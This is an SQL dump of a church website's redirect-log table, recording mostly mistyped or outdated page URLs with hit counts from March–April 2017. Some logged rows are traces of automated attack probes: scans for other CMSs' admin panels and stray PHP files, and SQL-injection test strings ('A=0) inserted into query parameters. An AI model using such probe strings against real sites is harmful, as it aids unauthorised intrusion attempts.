(4445, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-c', NULL, '', '', 1, 0, '2017-03-23 18:09:39', '0000-00-00 00:00:00', 301),
(4446, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-', NULL, '', '', 1, 0, '2017-03-23 18:09:39', '0000-00-00 00:00:00', 301),
(4447, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-conf', NULL, '', '', 1, 0, '2017-03-23 18:09:40', '0000-00-00 00:00:00', 301),
(4448, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-con', NULL, '', '', 1, 0, '2017-03-23 18:09:40', '0000-00-00 00:00:00', 301),
(4449, 'https://lifeoasisinternationalchurch.org/loic/globalintercessorynetwork.php', NULL, '', '', 3, 0, '2017-03-23 18:12:33', '0000-00-00 00:00:00', 301),
(4450, 'https://lifeoasisinternationalchurch.org/index.php/268-day-8-of-21-days-fasting-and-prayer-november', NULL, '', '', 18, 0, '2017-03-23 18:43:56', '0000-00-00 00:00:00', 301),
(4451, 'http://lifeoasisinternationalchurch.org/bitrix/admin/', NULL, 'http://lifeoasisinternationalchurch.org/bitrix/admin/', '', 1, 0, '2017-03-23 20:50:03', '0000-00-00 00:00:00', 301),
(4452, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/category/-family-women', NULL, '', '', 1, 0, '2017-03-23 22:15:36', '0000-00-00 00:00:00', 301),
(4453, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/category+/6-family-women', NULL, '', '', 1, 0, '2017-03-24 01:16:21', '0000-00-00 00:00:00', 301),
(4454, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/category', NULL, '', '', 1, 0, '2017-03-24 01:16:33', '0000-00-00 00:00:00', 301),
(4455, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/category/', NULL, '', '', 1, 0, '2017-03-24 01:16:33', '0000-00-00 00:00:00', 301),
(4456, 'http://www.lifeoasisinternationalchurch.org/options/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/options/logo_img.php', '', 1, 0, '2017-03-24 04:10:14', '0000-00-00 00:00:00', 301),
(4457, 'http://lifeoasisinternationalchurch.org/index.php/admin/', NULL, 'http://lifeoasisinternationalchurch.org/index.php/admin/', '', 1, 0, '2017-03-24 06:08:14', '0000-00-00 00:00:00', 301),
(4458, 'https://lifeoasisinternationalchurch.org/gobc2015', NULL, '', '', 73, 0, '2017-03-24 06:09:03', '0000-00-00 00:00:00', 301),
(4459, 'https://lifeoasisinternationalchurch.org/index.php/280-day-20-of-21-days-fasting-and-prayer-november', NULL, '', '', 28, 0, '2017-03-24 06:09:55', '0000-00-00 00:00:00', 301),
(4460, 'https://lifeoasisinternationalchurch.org/loic/abundantlifehouse.php', NULL, '', '', 4, 0, '2017-03-24 06:43:24', '0000-00-00 00:00:00', 301),
(4461, 'https://www.spiritmeat.net/full-hd-streaming', NULL, '', '', 1, 0, '2017-03-24 06:57:38', '0000-00-00 00:00:00', 301),
(4462, 'https://www.spiritmeat.net/main-streaming', NULL, '', '', 1, 0, '2017-03-24 06:58:12', '0000-00-00 00:00:00', 301),
(4463, 'https://www.spiritmeat.net/resources/streaming', NULL, '', '', 1, 0, '2017-03-24 06:59:04', '0000-00-00 00:00:00', 301),
(4464, 'https://lifeoasisinternationalchurch.org/index.php/videos', NULL, '', '', 109, 0, '2017-03-24 07:51:45', '0000-00-00 00:00:00', 301),
(4465, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/55-prayer-a-fasting-day-6', NULL, '', '', 13, 0, '2017-03-24 07:51:57', '0000-00-00 00:00:00', 301),
(4466, 'http://lifeoasisinternationalchurch.org/manager/', NULL, 'http://lifeoasisinternationalchurch.org/manager/', '', 1, 0, '2017-03-24 08:14:54', '0000-00-00 00:00:00', 301),
(4467, 'http://lifeoasisinternationalchurch.org/options/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/options/logo_img.php', '', 1, 0, '2017-03-24 08:27:29', '0000-00-00 00:00:00', 301),
(4468, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=13&Itemid=213', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=13&Itemid=213', '', 2, 0, '2017-03-24 10:15:54', '0000-00-00 00:00:00', 301),
(4469, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=13&Itemid=213', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=13&Itemid=213', '', 1, 0, '2017-03-24 10:16:01', '0000-00-00 00:00:00', 301),
(4470, 'http://lifeoasisinternationalchurch.org/netcat/admin/', NULL, 'http://lifeoasisinternationalchurch.org/netcat/admin/', '', 1, 0, '2017-03-24 10:21:00', '0000-00-00 00:00:00', 301),
(4471, 'https://lifeoasisinternationalchurch.org/loic/outreach.php', NULL, '', '', 7, 0, '2017-03-24 10:54:44', '0000-00-00 00:00:00', 301),
(4472, 'http://www.lifeoasisinternationalchurch.org/home/index.php/index.php/watch-gobc-live', NULL, '', '', 1, 0, '2017-03-24 12:58:42', '0000-00-00 00:00:00', 301),
(4473, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/54-slide-04', NULL, '', '', 6, 0, '2017-03-24 13:01:48', '0000-00-00 00:00:00', 301),
(4474, 'https://lifeoasisinternationalchurch.org/loic/onlinecommunities.php', NULL, '', '', 17, 0, '2017-03-24 13:47:35', '0000-00-00 00:00:00', 301),
(4475, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?limitstart=0', NULL, '', '', 8, 0, '2017-03-24 14:34:49', '0000-00-00 00:00:00', 301),
(4476, 'http://www.lifeoasisinternationalchurch.org/79-day-27', NULL, '', '', 1, 0, '2017-03-24 18:01:57', '0000-00-00 00:00:00', 301),
(4477, 'http://www.lifeoasisinternationalchurch.org/streamingl', NULL, '', '', 1, 0, '2017-03-24 20:24:48', '0000-00-00 00:00:00', 301),
(4478, 'https://lifeoasisinternationalchurch.org/loic/sermons.php', NULL, '', '', 10, 0, '2017-03-24 20:35:36', '0000-00-00 00:00:00', 301),
(4479, 'https://lifeoasisinternationalchurch.org/loic/thronemusic.php', NULL, '', '', 19, 0, '2017-03-24 20:35:58', '0000-00-00 00:00:00', 301),
(4480, 'https://lifeoasisinternationalchurch.org/loic/gobc.php', NULL, '', '', 6, 0, '2017-03-24 20:36:18', '0000-00-00 00:00:00', 301),
(4481, 'https://lifeoasisinternationalchurch.org/loic/revoyenike.php', NULL, '', '', 26, 0, '2017-03-24 20:37:09', '0000-00-00 00:00:00', 301),
(4482, 'https://lifeoasisinternationalchurch.org/loic/groups.php', NULL, '', '', 7, 0, '2017-03-24 20:37:34', '0000-00-00 00:00:00', 301),
(4483, 'http://www.lifeoasisinternationalchurch.org/about.html', NULL, '', '', 2, 0, '2017-03-24 20:51:35', '0000-00-00 00:00:00', 301),
(4484, 'http://lifeoasisinternationalchurch.org/resources/live-streaming/private', NULL, '', '', 5, 0, '2017-03-24 21:03:28', '0000-00-00 00:00:00', 301),
(4485, 'http://www.lifeoasisinternationalchurch.org/private streaming', NULL, '', '', 19, 0, '2017-03-24 21:17:20', '0000-00-00 00:00:00', 301),
(4486, 'http://lifeoasisinternationalchurch.org/streaming/traininging', NULL, '', '', 1, 0, '2017-03-24 21:20:24', '0000-00-00 00:00:00', 301),
(4487, 'http://lifeoasisinternationalchurch.org/streaming/training', NULL, '', '', 2, 0, '2017-03-24 21:20:46', '0000-00-00 00:00:00', 301),
(4488, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming/private', NULL, '', '', 19, 0, '2017-03-24 21:43:29', '0000-00-00 00:00:00', 301),
(4489, 'http://www.lifeoasisinternationalchurch.org/straeming', NULL, '', '', 2, 0, '2017-03-24 22:07:59', '0000-00-00 00:00:00', 301),
(4490, 'http://www.lifeoasisinternationalchurch.org/blog/administrator/index.php', NULL, '', '', 1, 0, '2017-03-25 00:02:34', '0000-00-00 00:00:00', 301),
(4491, 'http://lifeoasisinternationalchurch.org/traitr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:19', '0000-00-00 00:00:00', 301),
(4492, 'http://lifeoasisinternationalchurch.org/trainitr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:19', '0000-00-00 00:00:00', 301),
(4493, 'http://lifeoasisinternationalchurch.org/traintr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:19', '0000-00-00 00:00:00', 301),
(4494, 'http://lifeoasisinternationalchurch.org/trainintr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:20', '0000-00-00 00:00:00', 301),
(4495, 'http://lifeoasisinternationalchurch.org/ttr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:20', '0000-00-00 00:00:00', 301),
(4496, 'http://lifeoasisinternationalchurch.org/trainingtr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:20', '0000-00-00 00:00:00', 301),
(4497, 'http://lifeoasisinternationalchurch.org/trtr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:20', '0000-00-00 00:00:00', 301),
(4498, 'http://lifeoasisinternationalchurch.org/tr@n1ng', NULL, '', '', 2, 0, '2017-03-25 01:16:20', '0000-00-00 00:00:00', 301),
(4499, 'http://lifeoasisinternationalchurch.org/admin/language/english/total/search.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-25 02:24:37', '0000-00-00 00:00:00', 301),
(4500, 'http://lifeoasisinternationalchurch.org/system/logs/include20.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-25 02:37:57', '0000-00-00 00:00:00', 301),
(4501, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/3', NULL, '', '', 15, 0, '2017-03-25 03:35:49', '0000-00-00 00:00:00', 301),
(4502, 'http://www.lifeoasisinternationalchurch.org/162-focus20', NULL, '', '', 1, 0, '2017-03-25 05:01:07', '0000-00-00 00:00:00', 301),
(4503, 'http://lifeoasisinternationalchurch.org/administrator/system_info.php', NULL, '', '', 2, 0, '2017-03-25 15:10:31', '0000-00-00 00:00:00', 301),
(4504, 'http://lifeoasisinternationalchurch.org/private stream', NULL, '', '', 2, 0, '2017-03-25 20:19:24', '0000-00-00 00:00:00', 301),
(4505, 'http://lifeoasisinternationalchurch.org/private-stream', NULL, '', '', 2, 0, '2017-03-25 20:19:58', '0000-00-00 00:00:00', 301),
(4506, 'http://lifeoasisinternationalchurch.org/private-stream', NULL, '', '', 1, 0, '2017-03-25 20:19:55', '0000-00-00 00:00:00', 301),
(4507, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/08/19/15', NULL, '', '', 3, 0, '2017-03-26 04:03:45', '0000-00-00 00:00:00', 301),
(4508, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=52:daddy&catid=18:loic&Itemid=294', NULL, 'http://www.google.com.ng/search?ei=mUXXWOD8CavXgAaJnIaYCg&q=from+the+father%27s+heart+rev+areogun&oq=from+the+father%27s+heart+rev+areo&gs_l=mobile-gws-serp.1.0.33i21k1j33i160k1l3.31255.47763.0.50352.9.9.0.0.0.0.2461.7927.5-6j2j9-1.9.0....0...1c.1.64.mobile-gws-serp..0.8.6998...0j0i22i30k1j33i22i29i30k1._PtN5PiUdrA', '', 2, 0, '2017-03-26 04:38:54', '0000-00-00 00:00:00', 301),
(4509, 'http://lifeoasisinternationalchurch.org/resouce/streaming', NULL, '', '', 1, 0, '2017-03-26 11:03:52', '0000-00-00 00:00:00', 301),
(4510, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/HolySpirit', NULL, 'http://lifeoasisinternationalchurch.org/', '', 3, 0, '2017-03-26 12:02:57', '0000-00-00 00:00:00', 301),
(4511, 'https://lifeoasisinternationalchurch.org/loic/prayerrequest.php', NULL, '', '', 14, 0, '2017-03-26 12:11:20', '0000-00-00 00:00:00', 301),
(4512, 'http://www.lifeoasisinternationalchurch.org/youtu', NULL, '', '', 7, 0, '2017-03-26 13:11:47', '0000-00-00 00:00:00', 301),
(4513, 'http://lifeoasisinternationalchurch.org/null', NULL, '', '', 1, 0, '2017-03-26 14:36:29', '0000-00-00 00:00:00', 301),
(4514, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-790384b5fa7a1af83d2b706fd1b53d1a.php', NULL, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/21-dealing-with-buts-in-your-life?layout=popup&tmpl=component', '', 4, 0, '2017-03-26 17:47:24', '0000-00-00 00:00:00', 301),
(4515, 'http://www.lifeoasisinternationalchurch.org/index.php/component/users/?view=register', NULL, 'http://www.lifeoasisinternationalchurch.org', '', 9, 0, '2017-03-27 09:20:19', '0000-00-00 00:00:00', 301),
(4516, 'http://lifeoasisinternationalchurch.org/RESOURCES', NULL, '', '', 1, 0, '2017-03-27 10:47:06', '0000-00-00 00:00:00', 301),
(4517, 'http://lifeoasisinternationalchurch.org/loicforum/administrator/index.php', NULL, '', '', 1, 0, '2017-03-27 16:36:34', '0000-00-00 00:00:00', 301),
(4518, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/17-sample-content-6', NULL, '', '', 5, 0, '2017-03-27 18:17:40', '0000-00-00 00:00:00', 301),
(4519, 'http://www.lifeoasisinternationalchurch.org/prayer/10-2014fasting-prayer/171-prayer-focus-for-day-12', NULL, '', '', 1, 0, '2017-03-27 19:05:10', '0000-00-00 00:00:00', 301),
(4520, 'http://lifeoasisinternationalchurch.org/devotional/', NULL, '', '', 3, 0, '2017-03-27 19:53:01', '0000-00-00 00:00:00', 301),
(4521, 'http://www.lifeoasisinternationalchurch.org/j-stuff/web-links', NULL, '', '', 1, 0, '2017-03-27 21:29:25', '0000-00-00 00:00:00', 301),
(4522, 'http://www.lifeoasisinternationalchurch.org/streamingDon', NULL, '', '', 1, 0, '2017-03-28 00:14:42', '0000-00-00 00:00:00', 301),
(4523, 'http://www.lifeoasisinternationalchurch.org/template-info/typography', NULL, '', '', 1, 0, '2017-03-28 00:49:20', '0000-00-00 00:00:00', 301),
(4524, 'https://lifeoasisinternationalchurch.org/component/k2/item/', NULL, '', '', 8, 0, '2017-03-28 08:18:35', '0000-00-00 00:00:00', 301),
(4525, 'https://lifeoasisinternationalchurch.org/component/k2/item/administrator/', NULL, '', '', 1, 0, '2017-03-28 08:18:38', '0000-00-00 00:00:00', 301),
(4526, 'https://lifeoasisinternationalchurch.org/component/k2/administrator/', NULL, '', '', 1, 0, '2017-03-28 08:18:39', '0000-00-00 00:00:00', 301),
(4527, 'https://lifeoasisinternationalchurch.org/component/administrator/', NULL, '', '', 1, 0, '2017-03-28 08:18:40', '0000-00-00 00:00:00', 301),
(4528, 'http://www.lifeoasisinternationalchurch.org/template-info/extensions', NULL, '', '', 1, 0, '2017-03-28 10:28:12', '0000-00-00 00:00:00', 301),
(4529, 'http://www.lifeoasisinternationalchurch.org/template-info/module-variations', NULL, '', '', 1, 0, '2017-03-28 10:32:34', '0000-00-00 00:00:00', 301),
(4530, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/', NULL, '', '', 2, 0, '2017-03-28 12:08:36', '0000-00-00 00:00:00', 301),
(4531, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/administrator/', NULL, '', '', 2, 0, '2017-03-28 12:08:38', '0000-00-00 00:00:00', 301),
(4532, 'http://www.lifeoasisinternationalchurch.org/j-stuff', NULL, '', '', 1, 0, '2017-03-28 13:40:45', '0000-00-00 00:00:00', 301),
(4533, 'http://www.lifeoasisinternationalchurch.org/j-stuff/member-access', NULL, '', '', 1, 0, '2017-03-28 15:20:49', '0000-00-00 00:00:00', 301),
(4534, 'http://www.lifeoasisinternationalchurch.org/j-stuff/contact-us', NULL, '', '', 1, 0, '2017-03-28 15:23:28', '0000-00-00 00:00:00', 301),
(4535, 'http://lifeoasisinternationalchurch.org/livestreaming/private', NULL, '', '', 1, 0, '2017-03-28 15:24:50', '0000-00-00 00:00:00', 301),
(4536, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming//private', NULL, '', '', 1, 0, '2017-03-28 15:26:37', '0000-00-00 00:00:00', 301),
(4537, 'http://lifeoasisinternationalchurch.org/resources/private-streaming', NULL, '', '', 4, 0, '2017-03-28 15:32:02', '0000-00-00 00:00:00', 301),
(4538, 'http://lifeoasisinternationalchurch.org/steward', NULL, '', '', 4, 0, '2017-03-28 17:25:32', '0000-00-00 00:00:00', 301),
(4539, 'http://lifeoasisinternationalchurch.org/stewardmeeting', NULL, '', '', 1, 0, '2017-03-28 17:25:53', '0000-00-00 00:00:00', 301),
(4540, 'http://www.lifeoasisinternationalchurch.org/template-info/module-positions', NULL, '', '', 1, 0, '2017-03-28 18:27:49', '0000-00-00 00:00:00', 301),
(4541, 'http://www.lifeoasisinternationalchurch.org/prayer/138-2014-9', NULL, '', '', 2, 0, '2017-03-28 19:14:30', '0000-00-00 00:00:00', 301),
(4542, 'http://www.lifeoasisinternationalchurch.org/j-stuff/category-blog', NULL, '', '', 1, 0, '2017-03-28 20:03:39', '0000-00-00 00:00:00', 301),
(4543, 'http://www.lifeoasisinternationalchurch.org/template-info/menu-options', NULL, '', '', 1, 0, '2017-03-28 20:07:11', '0000-00-00 00:00:00', 301),
(4544, 'https://www.lifeoasisinternationalchurch.org/branches\'A=0', NULL, 'https://www.lifeoasisinternationalchurch.org/branches\'A=0', '', 3, 0, '2017-03-29 11:46:25', '0000-00-00 00:00:00', 301),
(4545, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/54-prayer-a-fasting-day-5', NULL, '', '', 2, 0, '2017-03-29 14:54:53', '0000-00-00 00:00:00', 301),
(4546, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/49-prayer-a-fasting-day-38', NULL, '', '', 10, 0, '2017-03-29 16:21:24', '0000-00-00 00:00:00', 301),
(4547, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/12-sample-content-1', NULL, '', '', 5, 0, '2017-03-29 17:26:50', '0000-00-00 00:00:00', 301),
(4548, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/48-prayer-a-fasting-day-37', NULL, '', '', 2, 0, '2017-03-29 22:11:32', '0000-00-00 00:00:00', 301),
(4549, 'https://www.lifeoasisinternationalchurch.org/component/user/?task=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=login', '', 11285, 0, '2017-03-30 01:03:22', '0000-00-00 00:00:00', 301),
(4550, 'https://www.lifeoasisinternationalchurch.org/option=com_user?view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/user/?task=register', '', 11314, 0, '2017-03-30 01:03:23', '0000-00-00 00:00:00', 301),
(4551, 'http://www.lifeoasisinternationalchurch.org/resources/zion-pillar/12-resources', NULL, '', '', 1, 0, '2017-03-30 07:09:22', '0000-00-00 00:00:00', 301),
(4552, 'http://lifeoasisinternationalchurch.org/your-profile?view=registration', NULL, '', '', 1, 0, '2017-03-30 09:29:29', '0000-00-00 00:00:00', 301),
(4553, 'http://lifeoasisinternationalchurch.org/index.php/user-login?view=registration', NULL, '', '', 1, 0, '2017-03-30 09:29:32', '0000-00-00 00:00:00', 301),
(4554, 'http://lifeoasisinternationalchurch.org/login.html?view=registration', NULL, '', '', 1, 0, '2017-03-30 09:29:39', '0000-00-00 00:00:00', 301),
(4555, 'http://lifeoasisinternationalchurch.org/index.php/user-profile?view=registration', NULL, '', '', 1, 0, '2017-03-30 09:29:44', '0000-00-00 00:00:00', 301),
(4556, 'http://lifeoasisinternationalchurch.org/account.html?view=registration', NULL, '', '', 1, 0, '2017-03-30 09:29:49', '0000-00-00 00:00:00', 301),
(4557, 'http://lifeoasisinternationalchurch.org/index.php/component/user/register', NULL, '', '', 4, 0, '2017-03-30 09:29:49', '0000-00-00 00:00:00', 301),
(4558, 'http://lifeoasisinternationalchurch.org/user-profile?view=registration', NULL, '', '', 1, 0, '2017-03-30 09:29:55', '0000-00-00 00:00:00', 301),
(4559, 'https://lifeoasisinternationalchurch.org/loic/testimonies.php', NULL, '', '', 8, 0, '2017-03-30 10:35:32', '0000-00-00 00:00:00', 301),
(4560, 'http://lifeoasisinternationalchurch.org/forum/', NULL, '', '', 5, 0, '2017-03-31 01:42:27', '0000-00-00 00:00:00', 301),
(4561, 'http://lifeoasisinternationalchurch.org/forums/', NULL, '', '', 3, 0, '2017-03-31 01:42:43', '0000-00-00 00:00:00', 301),
(4562, 'http://lifeoasisinternationalchurch.org/boards/', NULL, '', '', 1, 0, '2017-03-31 01:42:58', '0000-00-00 00:00:00', 301),
(4563, 'http://lifeoasisinternationalchurch.org/community/', NULL, '', '', 1, 0, '2017-03-31 01:43:13', '0000-00-00 00:00:00', 301),
(4564, 'http://lifeoasisinternationalchurch.org/board/', NULL, '', '', 1, 0, '2017-03-31 01:43:28', '0000-00-00 00:00:00', 301),
(4565, 'http://lifeoasisinternationalchurch.org/f/', NULL, '', '', 1, 0, '2017-03-31 01:43:43', '0000-00-00 00:00:00', 301),
(4566, 'http://lifeoasisinternationalchurch.org/blogs/', NULL, '', '', 1, 0, '2017-03-31 01:44:16', '0000-00-00 00:00:00', 301),
(4567, 'http://lifeoasisinternationalchurch.org/ipb/', NULL, '', '', 1, 0, '2017-03-31 01:44:51', '0000-00-00 00:00:00', 301),
(4568, 'http://lifeoasisinternationalchurch.org/vbulletin/', NULL, '', '', 1, 0, '2017-03-31 01:45:07', '0000-00-00 00:00:00', 301),
(4569, 'http://www.lifeoasisinternationalchurch.org/forum/', NULL, '', '', 1, 0, '2017-03-31 01:45:32', '0000-00-00 00:00:00', 301),
(4570, 'http://www.lifeoasisinternationalchurch.org/forums/', NULL, '', '', 1, 0, '2017-03-31 01:45:47', '0000-00-00 00:00:00', 301),
(4571, 'http://www.lifeoasisinternationalchurch.org/boards/', NULL, '', '', 1, 0, '2017-03-31 01:46:03', '0000-00-00 00:00:00', 301),
(4572, 'http://www.lifeoasisinternationalchurch.org/community/', NULL, '', '', 1, 0, '2017-03-31 01:46:18', '0000-00-00 00:00:00', 301),
(4573, 'http://www.lifeoasisinternationalchurch.org/board/', NULL, '', '', 1, 0, '2017-03-31 01:46:33', '0000-00-00 00:00:00', 301),
(4574, 'http://www.lifeoasisinternationalchurch.org/f/', NULL, '', '', 1, 0, '2017-03-31 01:46:48', '0000-00-00 00:00:00', 301),
(4575, 'http://www.lifeoasisinternationalchurch.org/blog/', NULL, '', '', 1, 0, '2017-03-31 01:47:15', '0000-00-00 00:00:00', 301),
(4576, 'http://www.lifeoasisinternationalchurch.org/blogs/', NULL, '', '', 1, 0, '2017-03-31 01:47:25', '0000-00-00 00:00:00', 301),
(4577, 'http://www.lifeoasisinternationalchurch.org/ipb/', NULL, '', '', 1, 0, '2017-03-31 01:48:01', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(4578, 'http://www.lifeoasisinternationalchurch.org/vbulletin/', NULL, '', '', 1, 0, '2017-03-31 01:48:16', '0000-00-00 00:00:00', 301),
(4579, 'http://lifeoasisinternationalchurch.org/catalog/', NULL, '', '', 1, 0, '2017-03-31 01:49:01', '0000-00-00 00:00:00', 301),
(4580, 'http://lifeoasisinternationalchurch.org/cart/', NULL, '', '', 1, 0, '2017-03-31 01:49:17', '0000-00-00 00:00:00', 301),
(4581, 'http://www.lifeoasisinternationalchurch.org/catalog/', NULL, '', '', 1, 0, '2017-03-31 01:50:02', '0000-00-00 00:00:00', 301),
(4582, 'http://www.lifeoasisinternationalchurch.org/cart/', NULL, '', '', 1, 0, '2017-03-31 01:50:17', '0000-00-00 00:00:00', 301),
(4583, 'http://lifeoasisinternationalchurch.org/cli/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/cli/logo_img.php', '', 2, 0, '2017-03-31 03:24:56', '0000-00-00 00:00:00', 301),
(4584, 'https://lifeoasisinternationalchurch.org/index.php/template-info/media-outreach', NULL, '', '', 43, 0, '2017-03-31 06:04:40', '0000-00-00 00:00:00', 301),
(4585, 'http://www.lifeoasisinternationalchurch.org/ministries/throne-room-music', NULL, '', '', 2, 0, '2017-03-31 08:10:00', '0000-00-00 00:00:00', 301),
(4586, 'http://lifeoasisinternationalchurch.org/template-info-2/the-church-2/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-31 11:57:36', '0000-00-00 00:00:00', 301),
(4587, 'http://lifeoasisinternationalchurch.org/index.php/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 14, 0, '2017-03-31 13:30:28', '0000-00-00 00:00:00', 301),
(4588, 'http://lifeoasisinternationalchurch.org/template-info/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-31 13:35:27', '0000-00-00 00:00:00', 301),
(4589, 'http://lifeoasisinternationalchurch.org/resources/private/streaming', NULL, '', '', 1, 0, '2017-03-31 15:44:03', '0000-00-00 00:00:00', 301),
(4590, 'http://lifeoasisinternationalchurch.org/private/live-streaming', NULL, '', '', 5, 0, '2017-03-31 15:55:43', '0000-00-00 00:00:00', 301),
(4591, 'http://www.lifeoasisinternationalchurch.org/[private', NULL, '', '', 1, 0, '2017-03-31 16:49:50', '0000-00-00 00:00:00', 301),
(4592, 'http://lifeoasisinternationalchurch.org/streaming/private', NULL, '', '', 10, 0, '2017-03-31 17:23:00', '0000-00-00 00:00:00', 301),
(4593, 'http://www.lifeoasisinternationalchurch.org/private ', NULL, '', '', 2, 0, '2017-03-31 17:54:51', '0000-00-00 00:00:00', 301),
(4594, 'http://www.lifeoasisinternationalchurch.org/streaming/st@ward!', NULL, '', '', 1, 0, '2017-03-31 18:38:58', '0000-00-00 00:00:00', 301),
(4595, 'http://lifeoasisinternationalchurch.org/provate', NULL, '', '', 1, 0, '2017-03-31 21:28:38', '0000-00-00 00:00:00', 301),
(4596, 'http://www.lifeoasisinternationalchurch.org/training/youtube', NULL, '', '', 1, 0, '2017-03-31 22:25:52', '0000-00-00 00:00:00', 301),
(4597, 'http://www.lifeoasisinternationalchurch.org/pmd/', NULL, 'http://www.lifeoasisinternationalchurch.org/pmd/', '', 2, 0, '2017-04-01 03:34:49', '0000-00-00 00:00:00', 301),
(4598, 'http://www.lifeoasisinternationalchurch.org/modx.php', NULL, 'http://www.lifeoasisinternationalchurch.org/modx.php', '', 1, 0, '2017-04-01 05:52:08', '0000-00-00 00:00:00', 301),
(4599, 'http://www.lifeoasisinternationalchurch.org/streamingp', NULL, '', '', 1, 0, '2017-04-01 07:03:08', '0000-00-00 00:00:00', 301),
(4600, 'https://lifeoasisinternationalchurch.org/loic/tracts.php', NULL, '', '', 5, 0, '2017-04-01 07:16:00', '0000-00-00 00:00:00', 301),
(4601, 'http://lifeoasisinternationalchurch.org/strreaming', NULL, '', '', 1, 0, '2017-04-01 07:16:21', '0000-00-00 00:00:00', 301),
(4602, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=remind/index.php', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php', '', 3, 0, '2017-04-01 07:38:57', '0000-00-00 00:00:00', 301),
(4603, 'http://lifeoasisinternationalchurch.org/template-info/mimmp/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-04-01 07:42:05', '0000-00-00 00:00:00', 301),
(4604, 'http://lifeoasisinternationalchurch.org/modx.php', NULL, 'http://lifeoasisinternationalchurch.org/modx.php', '', 2, 0, '2017-04-01 10:07:50', '0000-00-00 00:00:00', 301),
(4605, 'http://lifeoasisinternationalchurch.org/resources/training', NULL, '', '', 3, 0, '2017-04-01 12:06:05', '0000-00-00 00:00:00', 301),
(4606, 'http://www.lifeoasisinternationalchurch.org/t', NULL, '', '', 9, 0, '2017-04-01 12:16:24', '0000-00-00 00:00:00', 301),
(4607, 'http://www.lifeoasisinternationalchurch.org/tr', NULL, '', '', 6, 0, '2017-04-01 12:16:24', '0000-00-00 00:00:00', 301),
(4608, 'http://www.lifeoasisinternationalchurch.org/tra', NULL, '', '', 7, 0, '2017-04-01 12:16:25', '0000-00-00 00:00:00', 301),
(4609, 'http://www.lifeoasisinternationalchurch.org/trai', NULL, '', '', 7, 0, '2017-04-01 12:16:27', '0000-00-00 00:00:00', 301),
(4610, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content', NULL, '', '', 4, 0, '2017-04-01 12:26:02', '0000-00-00 00:00:00', 301),
(4611, 'http://www.lifeoasisinternationalchurch.org/2011-08-10-21-22-57', NULL, '', '', 1, 0, '2017-04-01 14:38:18', '0000-00-00 00:00:00', 301),
(4612, 'http://lifeoasisinternationalchurch.org/cache/js-8ef9fe39d82cc7f0b594267e44a9954a.php', NULL, 'http://lifeoasisinternationalchurch.org/resources/streaming-registered', '', 1, 0, '2017-04-01 15:45:34', '0000-00-00 00:00:00', 301),
(4613, 'http://lifeoasisinternationalchurch.org/cache/js-5634476de6747027221707f8cb0fb172.php', NULL, 'http://lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', '', 1, 0, '2017-04-01 19:17:48', '0000-00-00 00:00:00', 301),
(4614, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/default_icemegamenu.css', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4615, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/magnific-popup.css', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
